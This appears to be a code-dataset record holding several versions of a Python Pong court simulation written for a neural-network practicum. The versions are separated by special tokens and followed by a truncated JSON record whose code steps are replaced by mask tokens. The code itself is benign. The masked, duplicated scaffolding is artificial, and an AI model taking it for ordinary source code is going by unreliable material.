:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
def v_getBatSize(self):
"""
visu-getter
:return float Schlägerlänge (Größe)
"""
return self.batsize
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
def v_getPoint(self):
"""
visu-getter
:return: Liste [X,Y] des Punktestundes für Spieler 0 / 1
"""
return self.Points
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class court:
    """
    Models the pong playing field.

    Holds the ball (position and direction vectors), both players' bats
    (player 0 on the left edge, player 1 on the right edge) and the score.
    Inspectors come in two flavours:

    - ``scaled_sensor_*`` methods return values normalised to [-1, +1]
      (optionally with noise) for consumption by the neural networks.
    - ``v_get*`` methods return raw, unscaled values for the visualisation.
    """

    def __init__(self):
        """
        Initialise the court: field dimensions, ball speed, bat geometry,
        score, and a random start position/direction for the ball.
        """
        self.x_max = 16.0               # field width
        self.y_max = 9.0                # field height (16:9 aspect ratio)
        self.speed = 0.5                # ball displacement per tick
        self.outputNoiseMax = 0.0       # max amplitude of sensor noise
        self.infinite = False           # if True, the ball never goes out
        self.batsize = 1.0              # half-height of a bat
        self.batstep = 0.3              # bat movement per 'u'/'d' command
        self.posVec = None              # ball position [x, y]
        self.dirVec = None              # ball direction vector
        self._bathit = [False, False]   # bat hit this tick, per player
        self._out = [False, False]      # ball crossed goal line, per player
        self.Points = [0, 0]            # score, per player
        self.poi = [None, None]         # y of last point of impact, per player
        self.bat = [self.y_max / 2.0, self.y_max / 2.0]  # bat centres (y)
        self.bouncecount = 0            # rally length; used to break endless games
        self.__initvectors()

    def __initvectors(self):
        """
        Reset the ball's position and direction vectors.

        The ball starts on the vertical centre line at a random height and
        moves at a random angle within +/-45 degrees of the horizontal,
        towards a randomly chosen player.
        """
        rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
        rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle
            )], [np.sin(rotationAngle), np.cos(rotationAngle)]])
        # Rotate the unit x-vector by the random angle.
        self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
        # Serve towards a random side.
        if random.random() > 0.5:
            self.dirVec[0] *= -1.0
        self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]
            )
        self.bouncecount = 0

    def _incrpoints(self, player):
        """
        Increment the score of one player.

        :param player: player 0 or 1
        :type player: int
        :return: None
        """
        self.Points[player] += 1

    def __sensor_x(self):
        """
        Return the x component of the ball position, with noise applied.

        :return: float, x component of the position vector
        """
        return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax

    def __sensor_y(self):
        """
        Return the y component of the ball position, with noise applied.

        :return: float, y component of the position vector
        """
        return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax

    def __sensor_bat(self, player):
        """
        Return the bat centre (y axis) of one player, with noise applied.

        :param player: player 0 or 1
        :type player: int
        :return: float, bat position of the player
        """
        return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax

    def scaled_sensor_x(self):
        """
        Return the noisy x component of the ball position scaled to [-1, +1]
        (noise comes from __sensor_x()).

        :return: float, scaled x component
        """
        return self.__sensor_x() / (self.x_max / 2.0) - 1.0

    def scaled_sensor_y(self):
        """
        Return the noisy y component of the ball position scaled to [-1, +1]
        (noise comes from __sensor_y()).

        :return: float, scaled y component
        """
        return self.__sensor_y() / (self.y_max / 2.0) - 1.0

    def scaled_sensor_bat(self, player):
        """
        Return the noisy bat position of one player scaled to [-1, +1]
        (noise comes from __sensor_bat()).

        :param player: player 0 or 1
        :type player: int
        :return: float, scaled bat position of the player
        """
        return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0

    def hitbat(self, player):
        """
        Tell whether the player's bat was hit during the current tick.

        :param player: player 0 or 1
        :type player: int
        :return: bool, True if the bat was hit, False otherwise
        """
        return self._bathit[player]

    def scaled_sensor_err(self, player):
        """
        Return the player's error (distance between the point of impact and
        the noisy bat position) scaled to [-1, +1].

        :pre: hitbat(player) or out(player)
        :param player: player 0 or 1
        :type player: int
        :return: float, scaled error of the player
        """
        return (self.poi[player] - self.__sensor_bat(player)) / self.y_max

    def out(self, player):
        """
        Tell whether the ball crossed the player's goal line this tick.

        :param player: player 0 or 1
        :type player: int
        :return: bool, True if the ball went out on the player's side
        """
        return self._out[player]

    def getpoints(self, player):
        """
        Return the player's current score.

        :param player: player 0 or 1
        :type player: int
        :return: int, score of the player
        """
        return self.Points[player]

    def tick(self):
        """
        Advance the simulation by one tick.

        Moves the ball, clears the per-tick hit/out flags, restarts the ball
        if the rally has gone on too long (prevents endless games), reflects
        the ball off the top and bottom walls, and finally checks both goal
        lines for a bat hit or a point.

        :return: None
        """
        self.posVec += self.dirVec * self.speed
        self._bathit = [False, False]
        self._out = [False, False]
        # Break up endless rallies.
        if self.bouncecount > 10:
            self.__initvectors()
        # Reflect off the bottom wall.
        if self.posVec[1] < 0:
            self.posVec[1] *= -1.0
            self.dirVec[1] *= -1.0
        # Reflect off the top wall.
        if self.posVec[1] > self.y_max:
            self.posVec[1] = 2 * self.y_max - self.posVec[1]
            self.dirVec[1] *= -1.0
        self.__tickBounceLeft()
        self.__tickBounceRight()

    def __tickBounceLeft(self):
        """
        Check whether the ball leaves the field on the left (player 0) or is
        hit by player 0's bat, and update score/flags accordingly.

        :return: None
        """
        if self.posVec[0] < 0:
            # Interpolate back to the goal line to find the point of impact.
            factor = (0 - self.posVec[0]) / self.dirVec[0]
            poi = self.posVec + factor * self.dirVec
            self.poi[0] = poi[1]
            if poi[1] > self.bat[0] - self.batsize and poi[1] < self.bat[0
                ] + self.batsize:
                self._bathit[0] = True
            else:
                # Player 1 scores; use the shared helper for consistency.
                self._incrpoints(1)
                self._out[0] = True
            if self.infinite or self._bathit[0]:
                # Reflect the ball back into the field.
                self.posVec[0] *= -1.0
                self.dirVec[0] *= -1.0
                self.bouncecount += 1
            else:
                self.__initvectors()
                self.bouncecount = 0

    def __tickBounceRight(self):
        """
        Check whether the ball leaves the field on the right (player 1) or is
        hit by player 1's bat, and update score/flags accordingly.

        :return: None
        """
        if self.posVec[0] > self.x_max:
            # Interpolate back to the goal line to find the point of impact.
            factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
            poi = self.posVec + factor * self.dirVec
            self.poi[1] = poi[1]
            if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1
                ] + self.batsize:
                self._bathit[1] = True
            else:
                # Player 0 scores; use the shared helper for consistency.
                self._incrpoints(0)
                self._out[1] = True
            if self.infinite or self._bathit[1]:
                # Reflect the ball back into the field.
                self.posVec[0] = 2 * self.x_max - self.posVec[0]
                self.dirVec[0] *= -1.0
                self.bouncecount += 1
            else:
                self.__initvectors()
                self.bouncecount = 0

    def move(self, player, action):
        """
        Move one player's bat.

        The *action* parameter is overloaded: a string 'u'/'d' moves the bat
        up/down by one ``batstep``, while a float sets the bat directly from
        a scaled position in [-1, +1].  In both cases the bat is clamped to
        the field [0, y_max].

        :param player: player 0 or 1 (whose bat is moved)
        :type player: int
        :param action: 'u' or 'd' (step command), or a float in [-1, +1]
                       (absolute scaled position)
        :type action: str or float
        :return: None
        """
        if isinstance(action, str):
            if action == 'u':
                self.bat[player] += self.batstep
                if self.bat[player] > self.y_max:
                    self.bat[player] = self.y_max
            if action == 'd':
                self.bat[player] -= self.batstep
                if self.bat[player] < 0.0:
                    self.bat[player] = 0.0
        elif isinstance(action, float):
            # Map the scaled position [-1, +1] back to field coordinates.
            self.bat[player] = (action + 1) * self.y_max / 2
            if self.bat[player] < 0.0:
                self.bat[player] = 0.0
            if self.bat[player] > self.y_max:
                self.bat[player] = self.y_max

    def v_getSize(self):
        """
        Visualisation getter.

        :return: list [float x, float y] of the field size
        """
        return [self.x_max, self.y_max]

    def v_getSpeed(self):
        """
        Visualisation getter.

        :return: float, ball speed
        """
        return self.speed

    def v_getBatSize(self):
        """
        Visualisation getter.

        :return: float, bat half-height
        """
        return self.batsize

    def v_getDirVec(self):
        """
        Visualisation getter.

        :return: ball direction vector
        """
        return self.dirVec

    def v_getPosVec(self):
        """
        Visualisation getter.

        :return: ball position vector [float x, float y]
        """
        return self.posVec

    def v_getbat(self):
        """
        Visualisation getter.

        :return: list [bat player 0, bat player 1] of bat centre positions
        """
        return self.bat

    def v_getPoint(self):
        """
        Visualisation getter.

        :return: list [points player 0, points player 1] of the score
        """
        return self.Points
<|reserved_special_token_1|>
#!/usr/bin/env python3.4
# -*- coding: utf-8 -*-
"""
Das Pong-Spielfeld wird simuliert.
Court moduliert ein anpassbares Spielfeld für Pong mit einem standardmäßigen Seitenverhältnis von 16:9.
Jenes Spielfeld verfügt über einen Ball und zwei Schläger, jeweils links und rechts am Spielfeldrand,
sowie einen Punktestand für beide Spieler (0 und 1).
Spieler 0 spielt auf der linken Hälfte, Spieler 1 auf der rechten Hälfte.
Zwecks einfacher Adaptierung an Folgesysteme ist die Schnittstelle mit normierten Ein- und Ausgabewerten versehen,
welches alle Daten auf ein Interval [-1.0, 1.0] normiert.
"""
__author__ = "Daniel Speck, Florian Kock"
__copyright__ = "Copyright 2014, Praktikum Neuronale Netze"
__license__ = "GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Daniel Speck, Florian Kock"
__email__ = "2speck@informatik.uni-hamburg.de, 2kock@informatik.uni-hamburg.de"
__status__ = "Development"
import numpy as np
import random
class court:
    """
    Models the Pong playing field.

    The court holds a ball, two bats (player 0 at the left edge, player 1
    at the right edge) and the score for both players. It also provides
    inspectors for the data:

    - sensor accessors scaled to [-1.0, 1.0] for the neural networks
    - unscaled ``v_*`` getters for the visualisation
    """

    def __init__(self):
        """
        Initialise a court object: field, players and the ball's start
        position.

        :return: void
        """

        ##############################
        ### tunable parameters     ###
        ##############################

        # Field size (a 16:9 ratio has proven itself in tests).
        self.x_max = 16.0
        self.y_max = 9.0

        # Ball speed: scale factor applied to the (unit) direction vector;
        # newPosVec = oldPosVec + dirVec * speed
        self.speed = 0.5

        # Noise factor added to the reported ball position.
        # NOTE(review): never tested with noise enabled — keep at 0.
        self.outputNoiseMax = 0.0

        # Should the ball be able to leave the field, or bounce forever?
        # True  -> ball bounces forever, is never reset on a goal
        # False -> ball is reset to its start position after a goal
        self.infinite = False

        # Bat size for players 0 and 1, measured from the centre to one
        # end — i.e. enter HALF of the desired total bat length here!
        self.batsize = 1.0

        # In command mode the bat is moved with 'u' and 'd';
        # this is the corresponding step width.
        self.batstep = 0.3

        ############################################
        ### internal state (do not modify!)      ###
        ############################################

        # Position vector of the ball (origin is [0, 0]).
        self.posVec = None

        # Direction/movement vector of the ball (unit vector).
        self.dirVec = None

        # Whether the ball hit a bat this tick [left, right].
        self._bathit = [False, False]

        # Whether the ball crossed a goal line this tick [left, right].
        self._out = [False, False]

        # Score [player 0, player 1].
        self.Points = [0, 0]

        # Point of impact of the ball on a goal line; only filled after an
        # impact and then used for the error computation (supervised
        # learning).
        self.poi = [None, None]

        # Initial bat positions on their lines [left bat, right bat];
        # as usual in Pong, bats only move along the y axis.
        self.bat = [self.y_max / 2.0, self.y_max / 2.0]

        # Counts bat hits (ball/bat collisions). The networks are meant to
        # learn different (randomly initialised) angles; well-trained nets
        # can rally certain angles forever, so after 10 hits the field is
        # reset with the ball at the centre and a fresh random angle to
        # break such endless games.
        self.bouncecount = 0

        # Initialise position and direction vector for the first time.
        self.__initvectors()

    def __initvectors(self):
        """
        Initialise the ball's start position and direction vectors.

        The ball starts somewhere on the centre line with an arbitrary
        angle of at most +/-45 degrees from the horizontal; steeper angles
        have shown to hurt both learning quality and learning time.

        :return: void
        """
        # Random angle in radians; 2*pi is the full circle (360 degrees),
        # so [-pi/4, +pi/4] corresponds to the interval [-45, +45] degrees.
        rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)

        # Build the rotation matrix for that random angle ...
        rotMatrix = np.array([
            [np.cos(rotationAngle), -np.sin(rotationAngle)],
            [np.sin(rotationAngle), np.cos(rotationAngle)]
        ])

        # ... and apply it to a horizontal unit vector.
        self.dirVec = np.dot(rotMatrix, np.array([1, 0]))

        # Randomly decide whether the ball starts towards player 0 (left)
        # or player 1 (right) by mirroring the x component on the y axis.
        if random.random() > 0.5:
            self.dirVec[0] *= -1.0

        # Start somewhere on the centre line
        # (x fixed to the centre line, y random).
        self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()])

        # Reset the bat-hit counter (fresh rally).
        self.bouncecount = 0

    def _incrpoints(self, player):
        """
        Increase the score of one player.

        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return: void
        """
        self.Points[player] += 1

    def __sensor_x(self):
        """
        Return the x component of the ball's position vector, with noise.

        :return: float, x component of the position vector
        """
        return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax

    def __sensor_y(self):
        """
        Return the y component of the ball's position vector, with noise.

        :return: float, y component of the position vector
        """
        return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax

    def __sensor_bat(self, player):
        """
        Return the y position of one player's bat, with noise.

        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return: float, bat position of the given player
        """
        return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax

    def scaled_sensor_x(self):
        """
        Return the ball's x position scaled to [-1, +1], with noise
        (the noise comes from __sensor_x()).

        :return: float, scaled x component of the position vector
        """
        return self.__sensor_x() / (self.x_max / 2.0) - 1.0

    def scaled_sensor_y(self):
        """
        Return the ball's y position scaled to [-1, +1], with noise
        (the noise comes from __sensor_y()).

        :return: float, scaled y component of the position vector
        """
        return self.__sensor_y() / (self.y_max / 2.0) - 1.0

    def scaled_sensor_bat(self, player):
        """
        Return the given player's bat position scaled to [-1, +1], with
        noise (the noise comes from __sensor_bat()).

        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return: float, scaled bat position of the given player
        """
        return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0

    def hitbat(self, player):
        """
        Whether the given player's bat was hit in the current tick.

        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return: bool, True if the bat was hit, False otherwise
        """
        return self._bathit[player]

    def scaled_sensor_err(self, player):
        """
        Return the given player's error scaled to [-1, +1].

        :pre: hitbat(player) or out(player)
        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return: float, scaled error of the given player
        """
        return (self.poi[player] - self.__sensor_bat(player)) / self.y_max

    def out(self, player):
        """
        Whether the ball crossed the given player's goal line.

        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return: bool, True if the ball crossed the line, False otherwise
        """
        return self._out[player]

    def getpoints(self, player):
        """
        Return the given player's score.

        :param player: score of player 0 or 1
        :type player: int (0 or 1)
        :return: int, the player's score
        """
        return self.Points[player]

    def tick(self):
        """
        Compute one tick / game step.

        Moves the ball, resets the per-tick goal-line and bat-hit flags,
        and resets the ball position if the players rallied too long
        without a goal (to prevent endless games). Also bounces the ball
        off the top/bottom walls and finally evaluates whether the ball
        crossed a goal line or was hit by a bat.

        :return: void
        """
        #########################
        ### initialisation    ###
        #########################

        # Advance the ball one step; self.speed scales the unit vector.
        self.posVec += self.dirVec * self.speed

        # Per-tick flags: did a bat hit the ball / did the ball go out?
        # index 0 -> left bat, index 1 -> right bat
        self._bathit = [False, False]
        self._out = [False, False]

        ###################
        ### game logic  ###
        ###################

        # After more than 10 hits (each player hit at least 5 times) the
        # current endless rally is broken up and the game is restarted —
        # the networks would not learn anything new here.
        if self.bouncecount > 10:
            self.__initvectors()

        # Bounce off the bottom wall (y = 0).
        if self.posVec[1] < 0:
            self.posVec[1] *= -1.0
            self.dirVec[1] *= -1.0

        # Bounce off the top wall (y = y_max, presumably 9 here).
        if self.posVec[1] > self.y_max:
            self.posVec[1] = 2 * self.y_max - self.posVec[1]
            self.dirVec[1] *= -1.0

        # Check for a hit/goal on the left side (player 0).
        self.__tickBounceLeft()

        # Check for a hit/goal on the right side (player 1).
        self.__tickBounceRight()

    def __tickBounceLeft(self):
        """
        Check whether the ball crosses player 0's goal line on the left or
        is hit by the bat there.

        :return: void
        """
        # x < 0 means the ball crossed player 0's goal line this tick.
        if self.posVec[0] < 0:
            # Back-project to the exact point of impact (poi) on the line
            # of player 0 (x = 0).
            factor = (0 - self.posVec[0]) / self.dirVec[0]
            poi = self.posVec + (factor * self.dirVec)
            # Remember the impact height for scaled_sensor_err(player).
            self.poi[0] = poi[1]

            # Did the bat cover the point of impact? If so ...
            if (poi[1] > self.bat[0] - self.batsize) and (poi[1] < self.bat[0] + self.batsize):
                self._bathit[0] = True  # ... remember it for hitbat(player)
            else:  # otherwise ...
                self._incrpoints(1)  # ... goal for player 1 (right)
                self._out[0] = True  # and remember that the ball was out,
                                     # e.g. for out(player)

            # Let the ball bounce back if:
            # -> infinite is True (endless game, no ball reset), or
            # -> the bat hit the ball
            if self.infinite or self._bathit[0]:
                self.posVec[0] *= -1.0  # angle of incidence = angle of reflection
                self.dirVec[0] *= -1.0
                self.bouncecount += 1  # count the hit to break endless rallies
            else:
                self.__initvectors()  # no hit: restart the game
                self.bouncecount = 0

    def __tickBounceRight(self):
        """
        Check whether the ball crosses player 1's goal line on the right
        or is hit by the bat there.

        :return: void
        """
        # x > x_max (presumably 16 here) means the ball crossed player 1's
        # goal line this tick.
        if self.posVec[0] > self.x_max:
            # Back-project to the exact point of impact (poi) on the line
            # of player 1 (x = self.x_max).
            factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
            poi = self.posVec + (factor * self.dirVec)
            # Remember the impact height for scaled_sensor_err(player).
            self.poi[1] = poi[1]

            # Did the bat cover the point of impact? If so ...
            if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1] + self.batsize:
                self._bathit[1] = True  # ... remember it for hitbat(player)
            else:  # otherwise ...
                self._incrpoints(0)  # ... goal for player 0 (left)
                self._out[1] = True  # and remember that the ball was out,
                                     # e.g. for out(player)

            # Let the ball bounce back if:
            # -> infinite is True (endless game, no ball reset), or
            # -> the bat hit the ball
            if self.infinite or self._bathit[1]:
                # Two field lengths minus the current x gives the new x.
                self.posVec[0] = 2 * self.x_max - self.posVec[0]  # reflection
                self.dirVec[0] *= -1.0
                self.bouncecount += 1  # count the hit to break endless rallies
            else:
                self.__initvectors()  # no hit: restart the game
                self.bouncecount = 0

    def move(self, player, action):
        """
        Move a player's bat.

        This function is a little tricky: the "action" parameter accepts
        both a string as a direct up/down command and a float that places
        the bat directly.

        :param player: player 0 or 1 (whose bat is moved)
        :type player: int
        :param action: if str, 'u' or 'd' (move the bat up or down);
                       if float, place the bat at that position
        :type action: str or float
        :return: void
        """
        # isinstance (not `type(...) ==`) so float subclasses such as
        # numpy.float64 — the usual network output type — are accepted too.
        # Command mode:
        if isinstance(action, str):
            # Move the bat up.
            if action == 'u':
                self.bat[player] += self.batstep
                if self.bat[player] > self.y_max:  # clamp at the top edge
                    self.bat[player] = self.y_max
            # Move the bat down.
            if action == 'd':
                self.bat[player] -= self.batstep
                if self.bat[player] < 0.0:  # clamp at the bottom edge
                    self.bat[player] = 0.0
        # Placement mode:
        elif isinstance(action, float):
            # Map [-1.0, 1.0] onto [0.0, y_max].
            self.bat[player] = (action + 1) * self.y_max / 2
            if self.bat[player] < 0.0:  # clamp at the bottom edge
                self.bat[player] = 0.0
            if self.bat[player] > self.y_max:  # clamp at the top edge
                self.bat[player] = self.y_max

    def v_getSize(self):
        """
        Visualisation getter.

        :return: list [float: X, float: Y] with the field dimensions
        """
        return [self.x_max, self.y_max]

    def v_getSpeed(self):
        """
        Visualisation getter.

        :return: float, ball speed factor
        """
        return self.speed

    def v_getBatSize(self):
        """
        Visualisation getter.

        :return: float, bat half-length (size from centre to one end)
        """
        return self.batsize

    def v_getDirVec(self):
        """
        Visualisation getter.

        :return: direction/movement vector of the ball
        """
        return self.dirVec

    def v_getPosVec(self):
        """
        Visualisation getter.

        :return: position vector of the ball, list [float: X, float: Y]
        """
        return self.posVec

    def v_getbat(self):
        """
        Visualisation getter.

        :return: list [batPlayer0, batPlayer1] -> y position of each
                 player's bat centre
        """
        return self.bat

    def v_getPoint(self):
        """
        Visualisation getter.

        :return: list [X, Y] with the scores of players 0 and 1
        """
        return self.Points
|
flexible
|
{
"blob_id": "5485a1210a0c0361dbb000546ee74df725fad913",
"index": 5647,
"step-1": "<mask token>\n\n\nclass court:\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n self.x_max = 16.0\n self.y_max = 9.0\n self.speed = 0.5\n self.outputNoiseMax = 0.0\n self.infinite = False\n self.batsize = 1.0\n self.batstep = 0.3\n self.posVec = None\n self.dirVec = None\n self._bathit = [False, False]\n self._out = [False, False]\n self.Points = [0, 0]\n self.poi = [None, None]\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n self.bouncecount = 0\n self.__initvectors()\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle\n )], [np.sin(rotationAngle), np.cos(rotationAngle)]])\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]\n )\n self.bouncecount = 0\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n <mask token>\n <mask token>\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom 
Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player)) / self.y_max\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n 
return self.Points[player]\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n self.posVec += self.dirVec * self.speed\n self._bathit = [False, False]\n self._out = [False, False]\n if self.bouncecount > 10:\n self.__initvectors()\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n self.__tickBounceLeft()\n self.__tickBounceRight()\n <mask token>\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n if self.posVec[0] > self.x_max:\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[1] = poi[1]\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1\n ] + self.batsize:\n self._bathit[1] = True\n else:\n self.Points[0] += 1\n self._out[1] = True\n if self.infinite or self._bathit[1]:\n self.posVec[0] = 2 * self.x_max - self.posVec[0]\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param 
player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n if type(action) == str:\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n <mask token>\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass court:\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n self.x_max = 16.0\n self.y_max = 9.0\n self.speed = 0.5\n self.outputNoiseMax = 0.0\n self.infinite = False\n self.batsize = 1.0\n self.batstep = 0.3\n self.posVec = None\n self.dirVec = None\n self._bathit = [False, False]\n self._out = [False, False]\n self.Points = [0, 0]\n self.poi = [None, None]\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n self.bouncecount = 0\n self.__initvectors()\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle\n )], [np.sin(rotationAngle), np.cos(rotationAngle)]])\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]\n )\n self.bouncecount = 0\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n 